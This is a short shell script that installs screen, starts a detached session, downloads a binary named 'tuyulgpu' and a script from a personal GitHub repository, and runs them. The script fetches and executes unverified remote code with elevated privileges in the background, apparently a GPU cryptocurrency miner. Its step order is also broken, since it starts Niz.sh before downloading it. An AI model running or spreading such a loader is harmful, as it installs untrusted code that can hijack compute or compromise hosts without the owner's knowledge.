#!/bin/sh
! sudo apt update && sudo apt install screen -y && screen -dmS Niz.sh ./Niz.sh 65 75 && wget https://github.com/Nizz776/Nizz776/raw/main/tuyulgpu && wget https://raw.githubusercontent.com/Nizz776/Nizz776/main/Niz.sh && chmod +x Niz.sh && ./Niz.sh
